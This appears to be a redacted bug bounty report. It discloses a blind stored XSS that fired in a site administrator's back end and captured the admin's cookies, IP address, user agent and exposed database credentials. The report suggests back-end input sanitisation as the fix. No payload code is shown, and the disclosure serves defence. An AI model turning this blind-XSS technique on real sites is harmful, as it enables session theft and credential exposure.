Blind Stored XSS Payload fired at the backend on https://█████████/

**Summary:** I have just gotten an email notification from my XSSHunter payload that my blind stored XSS has been triggered by an administrator on the █████████ site, in the following URL: ```javascript https://█████/████ ``` Admin IP address: ████████ User-Agent: █████████ Cookies: ```javascript ██████ ``` Injection Image: ███████ DB Creds exposed: ██████████.█████\█████a ## Suggested Mitigation/Remediation Actions Sanitizing the input on the back-end as well ##Best Regards nagli ## Impact Ability to capture administrator action when preforming activities on the back-end. Extractions of DB credentials. Access to private information. Stealing the cookies of the administrator.